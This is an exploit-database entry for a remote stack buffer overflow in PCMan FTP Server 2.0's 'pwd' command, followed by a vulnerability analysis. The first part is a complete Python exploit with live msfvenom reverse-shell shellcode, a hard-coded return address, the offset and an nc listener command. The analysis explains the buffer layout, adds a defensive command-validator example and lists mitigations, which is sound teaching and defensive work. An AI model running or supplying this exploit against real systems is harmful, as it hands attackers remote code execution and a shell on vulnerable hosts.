PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow
# Exploit Title: PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow
# Date: 09/25/2023
# Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN)
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0
# Tested on: Windows XP SP3
#!/usr/bin/python
import socket
#buffer = 'A' * 2500
#offset = 2007
#badchars=\x00\x0a\x0d
#return_address=0x7e429353 (USER32.dll)
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.130 LPORT=4444 EXITFUNC=thread -f c -b "\x00\x0a\x0d"
#nc -nvlp 4444
overflow = (
"\xdb\xce\xd9\x74\x24\xf4\xba\xc1\x93\x3a\xcc\x58\x31\xc9"
"\xb1\x52\x31\x50\x17\x03\x50\x17\x83\x01\x97\xd8\x39\x7d"
"\x70\x9e\xc2\x7d\x81\xff\x4b\x98\xb0\x3f\x2f\xe9\xe3\x8f"
"\x3b\xbf\x0f\x7b\x69\x2b\x9b\x09\xa6\x5c\x2c\xa7\x90\x53"
"\xad\x94\xe1\xf2\x2d\xe7\x35\xd4\x0c\x28\x48\x15\x48\x55"
"\xa1\x47\x01\x11\x14\x77\x26\x6f\xa5\xfc\x74\x61\xad\xe1"
"\xcd\x80\x9c\xb4\x46\xdb\x3e\x37\x8a\x57\x77\x2f\xcf\x52"
"\xc1\xc4\x3b\x28\xd0\x0c\x72\xd1\x7f\x71\xba\x20\x81\xb6"
"\x7d\xdb\xf4\xce\x7d\x66\x0f\x15\xff\xbc\x9a\x8d\xa7\x37"
"\x3c\x69\x59\x9b\xdb\xfa\x55\x50\xaf\xa4\x79\x67\x7c\xdf"
"\x86\xec\x83\x0f\x0f\xb6\xa7\x8b\x4b\x6c\xc9\x8a\x31\xc3"
"\xf6\xcc\x99\xbc\x52\x87\x34\xa8\xee\xca\x50\x1d\xc3\xf4"
"\xa0\x09\x54\x87\x92\x96\xce\x0f\x9f\x5f\xc9\xc8\xe0\x75"
"\xad\x46\x1f\x76\xce\x4f\xe4\x22\x9e\xe7\xcd\x4a\x75\xf7"
"\xf2\x9e\xda\xa7\x5c\x71\x9b\x17\x1d\x21\x73\x7d\x92\x1e"
"\x63\x7e\x78\x37\x0e\x85\xeb\xf8\x67\x17\x6d\x90\x75\x17"
"\x63\x3d\xf3\xf1\xe9\xad\x55\xaa\x85\x54\xfc\x20\x37\x98"
"\x2a\x4d\x77\x12\xd9\xb2\x36\xd3\x94\xa0\xaf\x13\xe3\x9a"
"\x66\x2b\xd9\xb2\xe5\xbe\x86\x42\x63\xa3\x10\x15\x24\x15"
"\x69\xf3\xd8\x0c\xc3\xe1\x20\xc8\x2c\xa1\xfe\x29\xb2\x28"
"\x72\x15\x90\x3a\x4a\x96\x9c\x6e\x02\xc1\x4a\xd8\xe4\xbb"
"\x3c\xb2\xbe\x10\x97\x52\x46\x5b\x28\x24\x47\xb6\xde\xc8"
"\xf6\x6f\xa7\xf7\x37\xf8\x2f\x80\x25\x98\xd0\x5b\xee\xb8"
"\x32\x49\x1b\x51\xeb\x18\xa6\x3c\x0c\xf7\xe5\x38\x8f\xfd"
"\x95\xbe\x8f\x74\x93\xfb\x17\x65\xe9\x94\xfd\x89\x5e\x94"
"\xd7")
# Buffer layout: padding to the saved return address, the return address
# 0x7e429353 in little-endian byte order, a 32-byte NOP sled, then the payload.
shellcode = 'A' * 2007 + "\x53\x93\x42\x7e" + "\x90" * 32 + overflow
# Change IP/Port as required
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print "\nSending evil buffer..."
    s.connect(('192.168.146.135',21))
    data = s.recv(1024)
    s.send('USER anonymous' +'\r\n')
    data = s.recv(1024)
    s.send('PASS anonymous\r\n')
    s.send('pwd ' + shellcode + '\r\n')
    s.close()
    print "\nExploit completed successfully!."
except:
    print "Could not connect to FTP!"

PCMan FTP Server 2.0 – 'pwd' Remote Buffer Overflow Vulnerability Analysis
The PCMan FTP Server 2.0 has been identified as a critical security risk due to a remote buffer overflow vulnerability triggered by the pwd command. This flaw, discovered by cybersecurity researcher Waqas Ahmed Faroouqi (ZEROXINN), allows attackers to execute arbitrary code on the target system, potentially leading to full system compromise. The vulnerability was verified on Windows XP SP3, highlighting the ongoing risks associated with outdated and poorly maintained software.
Understanding the Vulnerability
Buffer overflow vulnerabilities occur when a program fails to validate the length of its input and copies it into a fixed-size buffer, so that data past the end of the buffer overwrites adjacent memory. In this case the handler for the pwd command, which normally only reports the current directory path, performs no bounds check on the command's argument: a long argument overruns the allocated buffer and corrupts the adjacent stack memory, including the saved return address.
The pwd command is only reachable after a login, but the server accepts anonymous credentials, so the authentication step is not a real obstacle: the exploit simply logs in as anonymous and then sends the oversized command, which makes the attack both simple and inconspicuous.
Exploit Mechanism
The exploit leverages a stack-based buffer overflow, corrupting the server's stack while it processes the pwd command. The attacker constructs a payload whose layout, in the order it is sent, is:
- A padding sequence ('A' * 2007) that fills the buffer up to the saved return address.
- A return address (0x7e429353, inside USER32.dll) that redirects execution to the shellcode.
- A NOP sled (0x90 * 32) that gives the redirected execution a margin before the shellcode starts.
- The shellcode, which opens a reverse shell.
When the buffer overflows, the saved return address is overwritten with this controlled value; on return the instruction pointer (EIP) is loaded from it, redirecting execution to the malicious code.
Exploit Code Breakdown
Explanation:
The script establishes a TCP connection to the FTP server on port 21. After connecting, it performs a standard login sequence using anonymous credentials. Once authenticated, it sends the pwd command with the crafted shellcode payload.
The shellcode variable (the complete buffer) is built from four parts:
- 2007 'A' characters: padding that fills the buffer up to the overwrite point; the script's comments record that the offset was found with a 2500-byte test buffer.
- \x53\x93\x42\x7e: the return address 0x7e429353, written in little-endian byte order, pointing into USER32.dll, which is loaded at a fixed location on Windows XP SP3 and therefore makes the hard-coded value reliable.
- \x90 * 32: a NOP sled that increases the likelihood of successful execution by providing a buffer zone where the CPU can "slide" into the shellcode.
- overflow: the actual shellcode, a windows/shell_reverse_tcp payload generated with msfvenom that connects back to the attacker's listener (nc -nvlp 4444 in the script's comments).
The payload was generated with the msfvenom -b option so that it contains none of the bad characters \x00 (null), \x0a (LF) and \x0d (CR), which would terminate the string or end the FTP command line early.
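The following is an added example, not the advisory's code and not PCMan's source: a hardened control-channel check of the kind the server lacks (the missing bounds check described under "Understanding the Vulnerability"), run as a detector over a constructed capture of the session above. NO_ARGUMENT_COMMANDS follows RFC 959, MAX_ARGUMENT_LENGTH is an assumed cap, and the shellcode is replaced by a 0xcc stand-in.

```python
from typing import NamedTuple

# RFC 959 commands that take no argument at all; PWD is one of them, so a
# PWD line carrying 2 KB of data is wrong before any length check is needed.
NO_ARGUMENT_COMMANDS = {"PWD", "CDUP", "QUIT", "NOOP", "SYST", "PASV", "ABOR"}
# Assumed per-argument cap for this example (not a PCMan setting).
MAX_ARGUMENT_LENGTH = 512


class Verdict(NamedTuple):
    command: str
    reply: str   # FTP reply code a hardened handler would send back
    reason: str


def validate_command(line: bytes) -> Verdict:
    """Bounds-check one control-channel line before any handler copies it."""
    line = line.rstrip(b"\r\n")            # strip the CRLF terminator
    cmd_b, _, arg = line.partition(b" ")   # verb and the rest of the line
    cmd = cmd_b.decode("ascii", "replace").upper()
    if not cmd:
        return Verdict(cmd, "500", "empty command line")
    if cmd in NO_ARGUMENT_COMMANDS and arg:
        return Verdict(cmd, "501", "argument given to an argument-less command")
    if len(arg) > MAX_ARGUMENT_LENGTH:
        return Verdict(cmd, "501", "argument too long (%d bytes)" % len(arg))
    if any(b < 0x20 or b > 0x7E for b in arg):
        return Verdict(cmd, "501", "non-printable bytes in argument")
    return Verdict(cmd, "200", "ok")


def flag_session(lines):
    """Run the validator over a captured session and return the
    (command, reason) pairs a detection rule would alert on."""
    verdicts = (validate_command(l) for l in lines)
    return [(v.command, v.reason) for v in verdicts if v.reply != "200"]


# Constructed control-channel capture that mirrors the script above; the
# shellcode is replaced with a 0xcc stand-in instead of being copied.
FAKE_SHELLCODE = b"\xcc" * 16
SESSION = [
    b"USER anonymous\r\n",
    b"PASS anonymous\r\n",
    b"pwd " + b"A" * 2007 + b"\x53\x93\x42\x7e" + b"\x90" * 32 + FAKE_SHELLCODE + b"\r\n",
]

if __name__ == "__main__":
    for command, reason in flag_session(SESSION):
        print("ALERT %s: %s" % (command, reason))
```

The PWD line is rejected on the argument-less rule alone; the length and byte-range checks catch the same buffer when it is sent through a command that does take an argument.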
Real-World Impact and Risk Assessment
Although PCMan FTP Server 2.0 is a legacy tool, its presence in certain environments—such as isolated industrial systems, embedded devices, or outdated network infrastructures—poses a significant risk. Attackers can exploit this vulnerability to:
- Gain remote access to the system.
- Execute arbitrary commands.
- Steal sensitive data.
- Deploy malware or establish persistent backdoors.
Windows XP has no ASLR, and DEP is not enforced for ordinary applications by default, so an exploit with a hard-coded return address such as this one works reliably. This highlights the importance of patching, upgrading, and decommissioning legacy software.
Security Recommendations
For organizations using PCMan FTP Server or similar outdated tools:
- Remove it from production environments immediately.
- Segment the network to isolate systems that cannot yet be removed.
- Add firewall rules that block access to port 21 from untrusted sources.
- Run regular vulnerability scans with tools such as Nessus or OpenVAS.
- Adopt secure alternatives such as SFTP (SSH-based) or a modern, actively patched FTP server.
Conclusion
The PCMan FTP Server 2.0 'pwd' buffer overflow is a textbook example of how poor input validation can lead to catastrophic security failures. It serves as a stark reminder that even seemingly benign commands can become attack vectors if not properly secured. Cybersecurity professionals must remain vigilant, especially when dealing with legacy systems. The exploitation of such vulnerabilities underscores the need for proactive security hygiene, continuous monitoring, and timely software updates.